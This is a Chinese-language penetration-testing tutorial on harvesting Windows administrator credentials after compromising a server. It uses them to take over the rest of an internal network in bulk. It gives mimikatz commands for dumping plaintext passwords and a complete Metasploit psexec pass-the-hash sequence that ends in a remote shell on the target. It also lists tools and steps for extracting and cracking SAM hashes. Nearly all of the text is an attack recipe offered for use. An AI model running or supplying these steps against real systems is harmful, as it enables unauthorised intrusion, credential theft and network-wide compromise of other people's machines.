在渗透测试内网环境下,拿到了windows服务器,为啥要去拿到对方管理员密码呢?把这些获得到了账号密码挂在到像绿盟的扫描器里,我们可以针对整个内网进行弱口令探测,这样我们可以批量拿下整个内网的其他服务器
.1)本地管理员密码如何直接获取
拿下了服务器后,直接通过mimikatz(法国大面包)读取管理员密码
第一条命令:privilige::debug(提升权限)
第二条命令:sekurlsa::logonpassWords(抓取密码)
附:emmmmm....windows有32位和64位的,区别对待。
不支持交互式,不能在webshell下抓取密码。
有一个缺点:在管理员改了密码之后,并且尚未重新登陆,你是再次获取不到新 密码的,我们可以通过别的工具,使用hash方法得到密码,但是有些复杂的hash,你也破解不了
2)利用hash远程登录系统,主要是通过MSF提供的exploit/winsows/smb/psexec
模块来完成。
kali中打开metasploit
命令:
msf>use exploit/windows/smb/psexec
msf>set RHOST 192.168.1.109(ip是目标主机的)
msf>set SMBUser administrator(目标用户密码)
msf>set SMBPass
44EFCE164AB921CAAAD3B435B514
04EE:32ED87BDB5FDC5E9CBA8854
7376818D4(抓取到的hash密码,当然是上面那个用户的啦)
msf>exploit
//......等待结果//
如果它告诉你获取到了一个会话,我们就得到了一个shell
msf>shell
进入对方终端啦,然后你想怎么干就怎么干
附:show option,查看用法,看看哪些选项需要输入的
3)当前面两种方法还是不行的话,我们....emmmm.....
1.通过LC5暴力破解hash密码,使用gmer直接提取sam和system文件或用Pwdump7
提取hash,最后使用LC5破解(长密码破解不出)
2.使用Ophcrack破解系统hash密码,要挂载彩虹表,安装完是绿色的一个14位的密码十几秒就破出来
可参考
http://simeon.blog.51cto.com/18680/122160
附:
我们管理员账号密码保存是在sam文件中的,有操作系统的所有账号密码,我们把sam文件和system文件拷贝出来后(如果有的不能提取,用gmer靠别),通过工具读里面的hash
其他:
GetPass.exe
命令:直接运行这个程序,切换到程序所在位置,输入:GetPassword >>1.txt(将密码输入到1.txt)
QuarksPwDump_v0.1
可自行百度 使用的命令